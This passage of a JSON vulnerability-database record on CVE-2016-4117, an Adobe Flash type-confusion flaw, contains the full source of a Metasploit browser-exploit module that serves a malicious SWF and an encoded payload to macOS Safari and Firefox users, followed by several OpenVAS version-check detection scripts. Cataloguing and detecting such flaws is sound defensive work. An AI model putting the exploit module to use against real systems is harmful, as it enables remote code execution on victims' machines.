"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-09T00:00:00", "id": "1337DAY-ID-32146", "href": "https://0day.today/exploit/description/32146", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 27 2016',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://0day.today/exploit/32146", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-24T21:26:05", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310808100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808100", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-Linux\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808100\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an unspecified\n vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 20.x through\n 21.0.0.240 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 21.0.0.241, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20.0\", test_version2:\"21.0.0.240\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.241\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Air Security Updates( apsb16-15 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808102", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_apsb16-15_macosx.nasl 11969 2018-10-18 14:53:42Z asteins $\n#\n# Adobe Air Security Updates( apsb16-15 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808102\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:48:15 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Air Security Updates( apsb16-15 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before\n 21.0.0.215 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 21.0.0.215 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"21.0.0.215\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"21.0.0.215\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:11", "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Air Security Updates( apsb16-15 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808101", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_apsb16-15_win.nasl 11969 2018-10-18 14:53:42Z asteins $\n#\n# Adobe Air Security Updates( apsb16-15 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808101\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:42:48 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Air Security Updates( apsb16-15 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before\n 21.0.0.215 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version\n 21.0.0.215 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"21.0.0.215\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"21.0.0.215\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:09", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-13T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-15 )-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310808104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808104", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-15 )-Linux\n#\n# Authors:\n# kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808104\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-13 10:56:22 +0530 (Fri, 13 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsb16-15 )-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.621 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.621 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.621\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.621\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:33", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310807698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807698", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807698\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.352 and 20.x before 21.0.0.242 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.352, or 21.0.0.242, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.241\"))\n{\n fix = \"21.0.0.242\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.352\"))\n{\n fix = \"18.0.0.352\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:06:58", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-064.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": 